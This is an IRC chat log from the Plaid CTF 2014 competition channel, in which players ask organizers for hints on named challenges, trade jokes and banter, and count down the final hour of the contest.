[02:11] <shadghost> namrog84: copy past is also hard?
[02:11] == nofiki1 [~Adium@207.98.148.16] has joined #pctf
[02:12] <namrog84> yes, I am clearly an incapable of normal computer operations
[02:12] <namrog84> can't even construct a sentence correctly either
[02:13] <tokki> asdfasdfasdfasfdafsadf
[02:13] <dkohlbre> is kappa supposed to take as much CPU as watching twitch does? Its making my laptop takeoff :/
[02:14] == dvddaver [~dvddaver@134.219.227.21] has joined #pctf
[02:15] == shortkidd [60279873@gateway/web/freenode/ip.96.39.152.115] has quit [Ping timeout: 240 seconds]
[02:15] == anyny0 [6babd56d@gateway/web/cgi-irc/kiwiirc.com/ip.107.171.213.109] has quit [Quit: http://www.kiwiirc.com/ - A hand crafted IRC client]
[02:16] == nofiki1 [~Adium@207.98.148.16] has quit [Client Quit]
[02:16] == sewilton [~shane@CPE68b6fc3e3053-CM68b6fc3e3050.cpe.net.cable.rogers.com] has quit [Ping timeout: 252 seconds]
[02:16] == Anyny0 [6babd56d@gateway/web/cgi-irc/kiwiirc.com/ip.107.171.213.109] has joined #pctf
[02:16] == _ariel [~root@93.154.251.21] has quit [Ping timeout: 240 seconds]
[02:16] <iago-x86> dkohlbre: It shouldn't
[02:16] <tokki> twitch pokemon!
[02:16] <namrog84> woo!! Got multiply is hard!
[02:17] <namrog84> <- idiot
[02:17] <tokki> did you get key?
[02:17] <namrog84> yep :D
[02:17] <tokki> holy shet, i should be working on it harder
[02:17] <dvddaver> Anybody solved ezhp?
[02:17] <namrog84> now back to the awful web150
[02:17] <Ymgve> dvddaver: only 58 teams
[02:17] == naam [~naam@83.141.77.130] has quit [Read error: Connection reset by peer]
[02:18] <haoz> im the another idiot >.<
[02:18] == _ariel [~root@78.30.88.107] has joined #pctf
[02:18] <asmoday> dogestege is that one where I have to find the same image online
[02:19] <haoz> namrog84 : mind to ...... ? :p
[02:19] <LMolr> tenement owns me
[02:19] <tokki> 38.55 * 1700 is freaking 65535
[02:19] <asmoday> hhahaha
[02:19] <namrog84> :D
[02:20] <tokki> :D
[02:20] <tokki> :D....
[02:20] <namrog84> ......  there it is, i typed it in, but i think the channel blocks flags :D
[02:20] <Adran> anyone willing to answer a question about a puzzle/hunt?
[02:20] <namrog84> just like passwords: ********
[02:20] <tokki> :D

[02:21] <acez> tylerni7: who can I ping for kappa ?
[02:21] <Ymgve> tokki: it's not a 1 pointer
[02:21] <supersat> man... I love paris. mov eax, 0  mov eax, [eax]
[02:21] <supersat> luuuuulz
[02:21] <+dickoff> acez: me
[02:21] <n00bz> web300 is down
[02:22] <tokki> :D

----------------April 13th -----------------------------------------------


OMG x_x had the whole irc log and yeah I checked it after posting- thanks so much!!! <3 k me savin in bookmarkz ILY Sorry for not noticing 

The following irc log was given by Adran- Thx <3
+)Plus, that's the reason the time's gonna get mixed up somewhere in the middle, thx (that's me trying to save logs at the last second)

19:00 #pctf: <+ricky> geobot: banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana
19:00 #pctf: < Guest68736> on web100
19:00 #pctf: < geobot> web100
19:00 #pctf: < Adran> on w
19:00 #pctf: < Hertz> yea works
19:00 #pctf: < Hertz> :D
19:00 #pctf: < sven> i'm about 5' 11"
19:00 -!- snoopybbt [~manu@131.175.28.197] has joined #pctf
19:00 #pctf: <+tylerni7> sven: ah okay, thanks
19:00 #pctf: <+dickoff> world's largest ctf player
19:00 #pctf: < sven> always glad to help!
19:00 #pctf: < geobot> (i'm glad to a team that means like pwn2own/pwnium 0days :p
19:01 #pctf: <+ricky> Only 2 more hours!
19:01 #pctf: <+tylerni7> D:
19:01 #pctf: <+tylerni7> and the top 3 are still in contention!
19:02 -!- bool_101 [~bool@67.163.29.185] has joined #pctf
19:02 #pctf: < Hertz> give me some flags, to have top 4 in contention
19:02 #pctf: < AnthraX101> And the last file just opened. Lucky, that :P
19:02 #pctf: < nopple> geobot: ricky cheese ricky cheese ricky cheese ricky cheese ricky cheese ricky cheese ricky cheese ricky cheese
19:02 #pctf: <+ricky> Hahh
19:02 #pctf: <+ricky> Oh wow
19:02 #pctf: <+ricky> Jackshit is out
19:02 #pctf: <+ricky> Go go go
19:02 #pctf: <+ricky> (As if we didn't already have enough challenges0
19:02 #pctf: <+ricky> This will be the last one I believe
19:02 #pctf: <+ricky> Have fnu
19:03 -!- amar [80edcf34@gateway/web/freenode/ip.128.237.207.52] has joined #pctf
19:05 -!- jakemask [~jakemask@cpe-75-80-53-234.san.res.rr.com] has joined #pctf
19:07 #pctf: < mrsmith67> for web100 does bruting with oed really work?
19:08 #pctf: < lkwpeter> good question
19:08 #pctf: < lkwpeter> forbidden or allowed ?!
19:09 #pctf: <+tylerni7> it won't work...
19:09 #pctf: <+tylerni7> well
19:09 #pctf: <+tylerni7> you can try
19:10 -!- someone_ [d1cb4e22@gateway/web/freenode/ip.209.203.78.34] has joined #pctf
19:10 #pctf: < almac> who can I PM to get a little guidance for kpop?
19:10 #pctf: <+ricky> Aaaany more bronies questions?  Someone's got to take the 500 points :-)
19:11 #pctf: < Adran> ricky: what is the answer? =D
19:11 #pctf: <+tylerni7> poop
19:11 #pctf: < Adran> (joking)
19:11 #pctf: <+ricky> The answer is the contents of the key file
19:11 #pctf: < geobot> or the contents of jerkcity
19:11 #pctf: <+tylerni7> geobot: you are the best
19:11 -!- Zoro [328200f8@gateway/web/freenode/ip.50.130.0.248] has joined #pctf
19:13 -!- cool_guy [~cool_guy@14.139.82.6] has joined #pctf
19:13 #pctf: < wtbw> how long left?
19:14 #pctf: <+cai_> little less than 2 hours
19:14 #pctf: <+ricky> Enough time to hack the Bigson!
19:15 #pctf: <+tylerni7> :P
19:15 #pctf: < johnCool> Well, I've got enough of this :) Thanks you guys it was a great ctf.
19:15 #pctf: <+ricky> Thanks for playing!
19:15 #pctf: < wtbw> ty
19:15 -!- phiber__ [~bleh@75.Red-81-36-175.dynamicIP.rima-tde.net] has joined #pctf
19:16 -!- Saxophie [~sophie@ip-83-134-206-91.dsl.scarlet.be] has joined #pctf
19:16 #pctf: < NK_> just to be sure
19:16 #pctf: < halfvollemelk> web100.. i'm logged in as admin, but no admin interface?
19:16 #pctf: < geobot> i am going for bronies 2 logged in physical sports?
19:16 #pctf: < NK_> is the tor service still up ?
19:16 #pctf: <+tylerni7> NK_: :|
19:16 #pctf: <+tylerni7> I will check
19:16 #pctf: <+tylerni7> but...
19:16 #pctf: <+tylerni7> it has been up the entire game
19:16 #pctf: <+houqp_> ninjafish: yes
19:16 #pctf: < NK_> okay :)
19:16 #pctf: <+tylerni7> and like 100 people have asked
19:17 #pctf: <+houqp_> NK_: yes
19:17 #pctf: < NK_> oh
19:17 #pctf: < NK_> sorry then :)
19:17 #pctf: <+ricky> halfvollemelk: There should be a message that tells you what to do next when you login as admin
19:18 #pctf: < NK_> tor is too damn slow
19:18 #pctf: < Zoro> molasses
19:18 #pctf: <+houqp_> NK_: yeah, you need to do somethign about it
19:18 #pctf: < NK_> okay
19:19 -!- BinaryCrystal [~Evan@wifi.skullspace.ca] has left #pctf []
19:19 #pctf: < foundation> i have a new feature request for radare2
19:19 #pctf: < NK_> i see
19:19 #pctf: < foundation> fing C++ template debugging support!!!
19:19 #pctf: < Guest68736> hahahaha the video on web100
19:19 #pctf: < Guest68736> xD
19:20 #pctf: < ciliated> any hints on kpop?
19:20 #pctf: < geobot> darn, we should use pm for kpop?
19:21 -!- inter [~inter@d99-199-6-217.bchsia.telus.net] has joined #pctf
19:22 -!- chrissing [~nullProte@pool-71-191-221-210.washdc.fios.verizon.net] has joined #pctf
19:22 #pctf: < Zoro> What are the CHANCE tiles for?
19:22 #pctf: <+tylerni7> Zoro: read the rules
19:22 -!- mode/#pctf [+o cai_] by ChanServ
19:22 -!- copyleft_ [~copyleft@66.55.134.203] has joined #pctf
19:23 -!- cai_ changed the topic of #pctf to: [Plaid CTF 2014 - play.plaidctf.com] 2.5 Hours left | $40 added to each cash prizes so far (from CHANCE card)
19:23 #pctf: <@cai_> apparently i missed one :p
19:23 #pctf: <+tylerni7> :O
19:23 -!- [GoN]Jakkdu [~GoNJakkd@143.248.235.24] has joined #pctf
19:23 -!- mode/#pctf [-o cai_] by ChanServ
19:23 -!- PoopyPantsSr [~user@c-68-49-76-217.hsd1.md.comcast.net] has joined #pctf
19:23 #pctf: < jagger_> 2.5h? and not 1.5?
19:23 #pctf: <+cai_> 1.5
19:23 #pctf: <+cai_> i only updated the cash bonus. i'll update topic again
19:24 -!- mode/#pctf [+o cai_] by ChanServ
19:24 -!- bool1011 [~bool@c-67-163-29-185.hsd1.in.comcast.net] has joined #pctf
19:24 -!- cai_ changed the topic of #pctf to: [Plaid CTF 2014 - play.plaidctf.com] 1.5 Hours left | $40 added to each cash prizes so far (from CHANCE card)
19:24 -!- mode/#pctf [-o cai_] by ChanServ
19:28 #pctf: <+mserrano> Hi Brooklynt Overflow
19:28 #pctf: <+mserrano> We are glad you had a burger for lunch and it was good
19:28 #pctf: <+dickoff> Brooklynt_Overfl: Where'd you get your burger
19:28 #pctf: <+ricky> We had Indian food for lunch
19:28 #pctf: <+ricky> It was better than your burger
19:28 #pctf: <+tylerni7> ricky: did you get it from the place on craig?
19:28 #pctf: <+ricky> Yup
19:28 #pctf: <+tylerni7> how was it?
19:28 #pctf: <+ricky> Big fan of that place
19:28 #pctf: <+tylerni7> I've never been there
19:28 #pctf: <+tylerni7> not tamarind, righ?
19:28 #pctf: <+ricky> Oh you've got to try it
19:28 #pctf: <+tylerni7> right*
19:29 #pctf: <+ricky> No, Kohli's
19:29 #pctf: <+tylerni7> huh
19:29 #pctf: < zoku> I have ezhp working locally, but not on your server?
19:29 #pctf: <+mserrano> tylerni7: tamarind is super good but way more expensive
19:29 #pctf: <+mserrano> zoku: are you assuming aslr is off
19:29 #pctf: < zoku> yes
19:29 #pctf: <+tylerni7> I went to the old one before they shut down, and it was /ok/
19:29 #pctf: <+mserrano> because that assumption is wrong
19:29 -!- bool101 [~bool@unaffiliated/bool101] has joined #pctf
19:29 #pctf: < zoku> er, sorry mserrano, no
19:29 #pctf: <+tylerni7> hadn't been to the new one
19:29 #pctf: < zoku> mserrano: it runs on my server with aslr on
19:29 #pctf: < zoku> $ cat /proc/sys/kernel/randomize_va_space
19:29 #pctf: < zoku> 2
19:29 #pctf: <+mserrano> zoku: on some systems aslr does not randomize the relevant thing
19:29 #pctf: <+mserrano> on our system it does
19:29 #pctf: <+mserrano> v0v
19:29 #pctf: < zoku> god damnit
19:29 #pctf: <+tylerni7> oh boy, dragon sector got zfs
19:30 #pctf: <+tylerni7> :O
19:30 #pctf: <+ricky> Uh oh
19:30 #pctf: <+mserrano> The binary running on the server is the same as the one we gave you
19:30 #pctf: <+tylerni7> WHO WILL WIN
19:30 #pctf: <+ricky> Getting cloes again
19:30 #pctf: <+tylerni7> this is so exciting
19:30 #pctf: <+mserrano> and it has been confirmed to work
19:30 #pctf: <+mserrano> MUCH EXCITE
19:30 #pctf: <+mserrano> SUCH WOW
19:30 #pctf: <+ricky> I think whoever hacks the Bigson will win
19:30 #pctf: <+mserrano> VERY FLAGE
19:30 #pctf: < geobot> teh flage is not poop
19:30 #pctf: <+mserrano> MANY CTF
19:30 #pctf: <+ricky> So you should all drop everything and go hack the Bigson
19:30 #pctf: <+frozencemetery> worship the old norse gods!
19:30 #pctf: <+tylerni7> geobot: that's not even true!
19:30 #pctf: < geobot> not even tried to determine who gets to you might be stuck on some inconsistencies in windows but works
19:30 #pctf: <+dickoff> geobot: don't leak flags in channel please
19:30 #pctf: < clockish> geobot: you lie!
19:30 #pctf: <+ricky> geobot: banana
19:31 #pctf: <+mserrano> geobot: banana
19:31 #pctf: <+houqp_> geobot: banana
19:31 #pctf: < clockish> geobot: banana banana banana banana banana banana
19:31 #pctf: <+cai_> geobot: banana
19:31 #pctf: <+dickoff> I like bananas
19:31 #pctf: < wtbw> O_o
19:31 #pctf: <+frozencemetery> geobot: bananananananabatman
19:31 #pctf: < clockish> banana banana banana banana banana banana
19:31 #pctf: <+houqp_> geobot: poopnana
19:31 #pctf: <+dickoff> he's too clever for us
19:32 #pctf: < KT> lol :)
19:32 -!- copyleft_ [~copyleft@209.222.15.233] has joined #pctf
19:33 #pctf: <+ricky> You can hack the Bigson from a mobile device - isn't web awesome?
19:33 -!- sweet_potatoes [~sweet_pot@113.162.145.1] has joined #pctf
19:33 #pctf: < Thordenm> ricky: but can you do it with punchcards?
19:33 -!- zoomequipd [~zoomequip@gateway/tor-sasl/zoomequipd] has joined #pctf
19:34 -!- nonconstant [c1e17dfd@gateway/web/freenode/ip.193.225.125.253] has joined #pctf
19:34 #pctf: < sweet_potatoes> any hint for web200 (javascript one) :/ ?
19:34 #pctf: < oceanx> banananaaaaa
19:34 #pctf: < sweet_potatoes> lolz
19:34 -!- asdsaf [~dsa@wsip-72-215-223-131.om.om.cox.net] has joined #pctf
19:34 #pctf: < sweet_potatoes> oceanx: sexy ?
19:34 #pctf: < sigsegv_> any hints on stego?
19:34 #pctf: < geobot> i'm done according to organizers told us hints
19:34 #pctf: <+tylerni7> sigsegv_: the flag is INSIDE THE COMPUTER
19:34 -!- _joe_ [~The@174-22-90-162.sxfl.qwest.net] has joined #pctf
19:34 #pctf: < inter> tylerni7: NO THE FLAG IS IN YOUR MIND
19:35 #pctf: < inter> SO YOU TELL; ME
19:35 #pctf: < Zerith> where do I enter a key for Misc ? :\
19:35 #pctf: < geobot> just enter the r_netsec folks
19:35 #pctf: < Zerith> oops
19:35 #pctf: < Zerith> ignore dat
19:35 #pctf: <+mserrano> Zerith: same place you enter any key
19:35 #pctf: <+mserrano> lol
19:35 #pctf: <+frozencemetery> i,i bend over and I'll show you
19:35 #pctf: < inter> you shouldve
19:35 #pctf: < inter> named the multiplication question "multiplication is gay"
19:36 #pctf: <+frozencemetery> yeah that's not happening inter.
19:36 #pctf: < _blasty_> ok
19:36 #pctf: < Pitr_>  wrong. gay multiplication is an oxymoron amongst almost all species.
19:36 #pctf: < `Peluche> For chall graphs (crypto 200), when we got the message, do we have to do someting next with the message or the message is the flag ?
19:37 #pctf: <+mserrano> `Peluche: the message is the flag
19:37 #pctf: < geobot> geobot can always know who own the message someone about 5 hours
19:37 #pctf: <+mserrano> but you can decode the number into text
19:39 -!- Digihash [~Digihash@dD576DCCA.access.telenet.be] has joined #pctf
19:39 #pctf: < `Peluche> mserrano: ok. thanks, so I guess I don't have the good number ^^
19:39 #pctf: < HeartLESS_> who is not busy? Have a question about web100
19:39 #pctf: < geobot> re200 runned correctly but not the video on web100 please?
19:40 -!- bool_101 [~bool@c-67-163-29-185.hsd1.in.comcast.net] has joined #pctf
19:40 #pctf: < HeartLESS_> ricky, I`ve wrote you pm
19:40 #pctf: < inter> tylerni7 is watching ponies, so hes not busy HeartLESS_
19:40 #pctf: < HeartLESS_> written*
19:40 -!- [CISSP]HoLyVieR [~HoLyVieR@bas2-montreal48-1128592620.dsl.bell.ca] has joined #pctf
19:40 #pctf: <+cai_> HeartLESS_: you can pm me
19:42 -!- shuckens [~Adium@host-252-206-107-208.midco.net] has joined #pctf
19:43 -!- Gut_ [uid24602@gateway/web/irccloud.com/x-lpojyjxhyocewncw] has joined #pctf
19:44 #pctf: < zoku> I've been working on ezhp all weekend and it works on all my systemmss, I just wanna scoree!
19:44 -!- rvpersie [~darkwonde@pool-100-1-142-100.nwrknj.fios.verizon.net] has joined #pctf
19:44 -!- bs` [~bs@gateway/tor-sasl/bs/x-48276796] has joined #pctf
19:44 #pctf: <+ricky> zoku: So you have a shell on one of our systems right
19:44 #pctf: <+ricky> Via the sass problem
19:44 #pctf: <+ricky> See if you can make it work on our system
19:45 #pctf: < sven> asking for a friend: what if i root that system to grab the flag? :-P
19:45 #pctf: < geobot> grats stratum auhuur for the web100 flag?
19:46 #pctf: <+tylerni7> sven: hmm ricky what do you think?
19:46 #pctf: <+tylerni7> sven: I'm not sure how much it'll help :P
19:46 #pctf: < geobot> it'll be done this year
19:46 #pctf: < _blasty_> DO WE BURN 0DAY YES NO ?
19:47 #pctf: <+mserrano> _blasty_: you... definitely do not have to
19:47 #pctf: < iago-x86> blackops: obviously
19:47 #pctf: < iago-x86> DOL IT
19:47 #pctf: < iago-x86> DO IT
19:47 #pctf: <+mserrano> _blasty_: you should solve bronies2 though
19:47 #pctf: <+mserrano> you can do it
19:47 #pctf: <+mserrano> I believe in you
19:47 #pctf: <+cai_> _blasty_: you could, and include that in your writeup
19:47 #pctf: <+tylerni7> xD
19:47 #pctf: <+mserrano> pls include full 0day in writeup
19:47 #pctf: <+dickoff> _blasty_: is it worth 4k? :)
19:47 #pctf: <+mserrano> 8k*
19:47 #pctf: < clockish> _blasty_: will trade 0-days 4 flags
19:47 #pctf: <+mserrano> or I guess 4k, yeah
19:47 #pctf: <+tylerni7> mserrano: well 1st vs 2nd
19:48 -!- DeadheadTn [~xtr4@41.226.164.163] has joined #pctf
19:49 #pctf: <+cai_> man, it's gonna be a huge pain to do a write-up for the ctf.. lol 30 something problems
19:49 #pctf: <+cai_> good luck..
19:49 #pctf: <+ricky> Hehe
19:49 #pctf: <+ricky> Didn't think of that :-)
19:49 #pctf: <+ricky> I see that the bigson is crashing
19:49 #pctf: <+ricky> This is a great sign :-)
19:50 #pctf: < sven> who would make that poor thing crash? :-(
19:50 #pctf: < spq> ricky: can we ask something about web800?
19:50 #pctf: <+ricky> spq: Sure thing
19:50 #pctf: <+mserrano> spq: ask away, you may not get a good answer :P
19:51 #pctf: < iago-x86> Luckily, I only solved a few. Easy to make writeup! :)
19:51 #pctf: <+tylerni7> iago-x86: writeup is just for cash prizes :)
19:51 #pctf: <+ricky> Shhh don't tell him that!
19:51 #pctf: < marcoscars02> xD
19:51 #pctf: <+mserrano> although we would be happy if you wrote writeups anyway :P
19:52 #pctf: <+tylerni7> EVERYONE WHO REGISTED IS REQUIRED TO MAKE WRITEUPS
19:52 #pctf: < marcoscars02> tylerni7, or to fill a blog
19:52 #pctf: < marcoscars02> XD
19:52 -!- nodocify [~nodocify@host-206-230-107-208.midco.net] has joined #pctf
19:52 #pctf: <+tylerni7> otherwise we'll kill you
19:52 #pctf: < clockish> yeah, everyone should do writeups!
19:52 #pctf: < clockish> democratize hacking!
19:52 #pctf: <+tylerni7> clockish: keep hacking elite!
19:52 #pctf: <+mserrano> unless you're tomcr00se in which case no writeups
19:52 #pctf: <+mserrano> in order to keep hacking elite
19:52 #pctf: <+frozencemetery> s/democratize/demoralize/ <-- for the way I read it first
19:52 #pctf: < clockish> tylerni7: up with the proletariat
19:52 #pctf: < poppopret> why does tomcr00se not write writeups?
19:52 #pctf: < inter> cuz he has swag
19:52 #pctf: <+tylerni7> poppopret: he wants to keep hacking elite
19:52 #pctf: <+mserrano> efn
19:52 #pctf: <+tylerni7> poppopret: also he's kind of a dick
19:52 #pctf: <+mserrano> efb*
19:53 #pctf: <+tylerni7> tomcr00se: <3
19:53 -!- mode/#pctf [+o cai_] by ChanServ
19:53 #pctf: <+mserrano> 70min to go
19:53 -!- cai_ changed the topic of #pctf to: [Plaid CTF 2014 - play.plaidctf.com] 1 Hour left | $40 added to each cash prizes so far (from CHANCE card)
19:53 #pctf: <+mserrano> 67*
19:53 -!- mode/#pctf [-o cai_] by ChanServ
19:53 #pctf: <+mserrano> go go go 0xffa/ds/mslc/etc
19:53 #pctf: <+mserrano> WHO WILL WIN THE ULTIMATE SHOWDOWN OF ULTIMATE HACKERY
19:54 #pctf: < clockish> tylerni7: note that we're not exactly great about writeups, either...
19:54 #pctf: <+ricky> Hey when we're required to, we write them
19:54 #pctf: <+cai_> we will turn off the scoreboard for the last hour
19:54 #pctf: <+cai_> j/k
19:55 #pctf: <+ricky> Half the room was about to turn around and yell at cai_
19:55 #pctf: < tokki> lol
19:55 #pctf: <+ricky> (The room we're sitting in)
19:55 #pctf: <+mserrano> naw we shoulda turned it off like 8 hours before the end
19:55 #pctf: < tokki> lool
19:55 #pctf: <+mserrano> codegate style
19:56 #pctf: < [CISSP]HoLyVieR> for the polygon challenge, was there anything posted about the dictionnary we have to brute-force with ? Or just any dictionnary should do ?
19:56 #pctf: < sven> pf, it's way more exciting this way :)
19:56 #pctf: <+mserrano> [CISSP]HoLyVieR: wat
19:56 #pctf: <+ricky> So PPP doesn't do stupid password brute forcing challenges
19:56 #pctf: <+ricky> Unless it's a crypto thing where the brute force is reasonable
19:56 #pctf: < clockish> and local
19:56 #pctf: <+ricky> Please note this for the future :-)
19:56 #pctf: < tokki> lol
19:57 #pctf: < [CISSP]HoLyVieR> "They claim bots can no longer attack the website protected by the Polygon Shifter. Do we need to manually bruteforce the credentials?"
19:57 #pctf: < [CISSP]HoLyVieR> that's in the description
19:57 #pctf: <+mserrano> [CISSP]HoLyVieR: if the question ever mentions manual bruteforcng
19:57 #pctf: <+ricky> OK, that's kind of just part of the whole making fun of shapesecurity
19:57 #pctf: <+mserrano> the answer is not manual bruteforcing
19:57 #pctf: <+mserrano> when's the last time you manually bruteforced something
19:57 #pctf: <+mserrano> and enjoyed it
19:57 #pctf: <+ricky> Like it's supposed to be sarcastic
19:57 #pctf: < [CISSP]HoLyVieR> I'm not manually brute-forcing it
19:57 #pctf: < oceanx> lol
19:57 #pctf: <+mserrano> bruteforce is not the answer
19:58 #pctf: < sven> it's a start, though
19:58 #pctf: <+mserrano> not a good one
19:58 #pctf: < sven> never claimed that :)
19:58 #pctf: < foundation> say no to manual bruteforcee!
19:58 #pctf: < tokki> i just had 30mins of manual bruteforcing lol
19:58 #pctf: < Adran> tokki: did that work?
19:58 #pctf: < sven> use automated bruteforce instead. more fun for everyone!
19:58 #pctf: < positron_> how to solve kpop without file write
19:59 #pctf: < tokki> :D YES
19:59 #pctf: < Adran> tokki: *.*
19:59 #pctf: < tokki> positron_: listen to kpops..?
19:59 #pctf: < Adran> ugh
19:59 #pctf: < tokki> *.*
19:59 -!- opxx [5b79cbc3@gateway/web/freenode/ip.91.121.203.195] has joined #pctf
19:59 #pctf: < opxx> how much time left?
19:59 #pctf: < tokki> 1HR
19:59 #pctf: < tokki> 111111
19:59 #pctf: < opxx> damn
20:00 #pctf: < tokki> ikr
20:00 #pctf: < opxx> stil no idwa about that js-web... this one + web800 are the hardest one
20:00 -!- nope_ [81f49032@gateway/web/freenode/ip.129.244.144.50] has joined #pctf
20:00 #pctf: < opxx> *idea
20:00 #pctf: < tokki> GOOD LUCK GUYS FOR THE LAST HOUR
20:00 #pctf: <+ricky> web800 is quality enterprise web
20:00 #pctf: < sven> for some value of quality
20:01 -!- Hero2Morow [43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.67.164.156.88] has joined #pctf
20:01 #pctf: < opxx> what do u mean by that?
20:01 #pctf: < sven> nothing.
20:01 -!- batzig [~batzig@75-25-137-24.lightspeed.plalca.sbcglobal.net] has joined #pctf
20:01 #pctf: <+ricky> I think 0xffa is about to solve part
20:01 #pctf: <+ricky> 2
20:01 #pctf: < ius> ricky: its not written in java is it
20:01 #pctf: <+ricky> Super super close :-)
20:02 #pctf: < Adran> ricky: i'm presuming you're monitoring the stuff? :P
20:02 #pctf: <+ricky> :-)
20:02 #pctf: <+cai_> Adran: he is :)
20:02 #pctf: < Adran> fun
20:02 -!- comex [~comex@ec2-50-17-179-5.compute-1.amazonaws.com] has joined #pctf
20:02 #pctf: <+ricky> Anyway, I suspect it's gg after you get that
20:02 #pctf: < tokki> ftw!
20:03 #pctf: <+ricky> Nicely done
20:03 -!- deject3d_ [~deject3d@205.204.16.136] has joined #pctf
20:03 #pctf: <+tylerni7> nicely *almost* done
20:03 #pctf: <+tylerni7> :P
20:03 #pctf: <+ricky> I'm sure it's coming any second now
20:03 #pctf: <+tylerni7> that's what she said
20:03 #pctf: < mathiasbynens> :D
20:03 #pctf: <+mserrano> :D
20:03 #pctf: <+ricky> :-(
20:03 -!- sdjakl [~sdjakl@fail0verflow.com] has joined #pctf
20:04 #pctf: < tokki> :D lol
20:06 #pctf: < inter> dude
20:06 #pctf: < inter> i
20:06 #pctf: < inter> i cant
20:06 #pctf: < inter> handle the ponies anymore
20:06 #pctf: < qll> xD
20:06 #pctf: <+ricky> Heheh
20:08 -!- batzig_ [~textual@75-25-137-24.lightspeed.plalca.sbcglobal.net] has joined #pctf
20:09 #pctf: < batzig_> for crypto 200 (graphs) does the decrypted number need to be converted to a string to be submitted?
20:09 #pctf: < tokki> my friend's saying he is getting high on ponies
20:09 #pctf: <+tylerni7> batzig_: yes
20:09 #pctf: < WuZ> I have a question for "rendez-vous", which admin can I pm?
20:09 #pctf: < opxx> any hint for halphow2js will be released?
20:10 #pctf: <+mserrano> 50min
20:10 #pctf: < iZsh> i'm about to have a heartattack
20:10 #pctf: < tokki> they're gonna release hints like
20:10 #pctf:  * sven too
20:10 #pctf: < tokki> in the last 30 seconds
20:10 #pctf: < opxx> ^^
20:10 #pctf: <+mserrano> lol
20:10 #pctf:  * sven can't take the suspense anymore :<
20:10 #pctf: <+mserrano> iZsh / sven: don't die
20:10 #pctf: <+tylerni7> at least not until you solve bronies
20:11 #pctf: < tokki> brownies!
20:11 -!- hammerpig [~user@gateway/tor-sasl/hammerpig] has joined #pctf
20:12 -!- Beched [6daa088b@gateway/web/freenode/ip.109.170.8.139] has joined #pctf
20:12 #pctf: < poppopret> is the polygon challenge supposed to be easy?
20:12 #pctf: <+tylerni7> fairly easy
20:12 #pctf: <+tylerni7> still 100 points though
20:12 -!- snoopybbt [~manu@131.175.28.197] has joined #pctf
20:13 #pctf: < deject3d_> for web100, we can assume the password length is what the page says right
20:13 #pctf: < dwn> I want to know how long hudak took mslc/dragon/etc.
20:13 #pctf: < dwn> because apparently I am really bad
20:13 #pctf: < Pitr_> Can someone explain the last step I'm missing in curlcore, in 1 hour? :)
20:13 #pctf: < poppopret> it's giving me an aneurysm
20:13 #pctf: < dwn> yea.
20:13 #pctf: < dwn> i mean it's fun
20:13 #pctf: < tokki> hudak means fast(?) in korean
20:13 #pctf: <+tylerni7> Pitr_: you can pm me... but I may not be able to help
20:13 #pctf: < dwn> but i am gonna take forever
20:14 #pctf: < factoreal> who solve web_200 reekee?
20:14 #pctf: <+tylerni7> factoreal: you can pm me specific questions about it
20:14 #pctf: < Hero2Morow> is parlor down?
20:14 #pctf: <+tylerni7> Hero2Morow: will check
20:14 #pctf: <+tylerni7> Hero2Morow: no
20:15 #pctf: < NK_> tylerni7: are you guys coming to phdays this year ?
20:15 #pctf: <+tylerni7> NK_: I think a few of us are...
20:16 #pctf: < positron_> gimme hints for kpop
20:16 #pctf: < Hero2Morow> cookie
20:16 #pctf: < Hero2Morow> jk i have no clue
20:16 #pctf: < Hero2Morow> jk i have no clue:(
20:16 -!- shuckens [~Adium@host-252-206-107-208.midco.net] has left #pctf []
20:16 #pctf: < Hero2Morow> ive bene trying to tolve it for 2 days :(
20:16 -!- muchacho [~muchacho@p5480404A.dip0.t-ipconnect.de] has joined #pctf
20:16 #pctf: < sven> hints are for the weak
20:17 #pctf: < tokki> lol if in any quals someone comes up and asks you for an autograph
20:17 #pctf: < tokki> that'll be me
20:17 #pctf: <+mserrano> < 45 minutes
20:17 -!- pcc7 [c0518434@gateway/web/freenode/ip.192.81.132.52] has joined #pctf
20:17 #pctf: < sven> fuckfuckfuck
20:17 #pctf: < tokki> *gasp*
20:17 #pctf: <+houqp_> gogogogogo
20:17 #pctf: < architekt> gogoogo
20:17 #pctf: <+houqp_> geobot: gogogogogo
20:17 #pctf: < tokki> gogogogog
20:18 #pctf: <+tylerni7> dragon sector! you still have time!
20:18 #pctf: < Hero2Morow> gooooooooooooooooooo
20:18 #pctf: < tokki> EVERYONE FTW
20:18 #pctf: < inter> what if i told you the real winner is tylerni7
20:18 #pctf: <+tylerni7> you would be wrong
20:18 #pctf: < halfvollemelk> gogogogogo GUYS!
20:18 #pctf: < inter> he spread the bronies around
20:18 #pctf: < inter> infecting normal people
20:19 #pctf: <+ricky> So cloes so close :-)
20:19 #pctf: < Hero2Morow> DRAGON SECTOR JUST GOT POINTS
20:19 #pctf: < Hero2Morow> DAYYYUUUU,
20:19 #pctf: < Hero2Morow> M
20:19 #pctf: < tokki> DAYUMMMMMN
20:19 #pctf: < acez> anyone here for 'jackshit' challenge ?
20:19 #pctf: < Pitr_> thanks tylerni7, I've got one more thing to try
20:19 #pctf: <+ricky> Uh oh
20:19 #pctf: <+tylerni7> ok
20:19 #pctf: <+mserrano> Hero2Morow: u wot m8
20:19 #pctf: < acez> tylerni7: 'jackshit' challenge admin around ?
20:19 #pctf: <+mserrano> acez: ping clockish
20:19 #pctf: < acez> thanks
20:19 #pctf: < clockish> yeah me
20:20 #pctf: < tokki> fuck my itunes just came on
20:20 #pctf: < tokki> and scared the shit out of me
20:21 #pctf: <+mserrano> < 40
20:21 #pctf: < halfvollemelk> gotta go, great CTF! thanks guys
20:22 #pctf: < Hero2Morow> you could fuck with people so hard
20:22 #pctf: <+mserrano> everybody
20:22 #pctf: <+tylerni7> halfvollemelk: thanks for playing!
20:22 #pctf: <+mserrano> ricky's favorite pony
20:22 #pctf: <+mserrano> is Princess Celestia
20:22 #pctf: < Hero2Morow> by solving a good amount fo the problems
20:22 #pctf: < tokki> ooh
20:22 #pctf: < Hero2Morow> but saving the flags for the last 20 minuteds
20:22 #pctf: <+tylerni7> Hero2Morow: yeahh...
20:22 #pctf: < Hero2Morow> and just jump to the top
20:22 #pctf: <+tylerni7> that's called "being a dick"
20:22 #pctf: < acez> btw the ctf ends in 40 minutes ?
20:22 #pctf: <+tylerni7> acez: 38
20:22 #pctf: <+tylerni7> but yeah
20:22 #pctf: <+tylerni7> (as in, on time)
20:22 #pctf: < acez> k thanks
20:23 #pctf: < Sin__> what did you guys do since the start to make the website more responsive ?
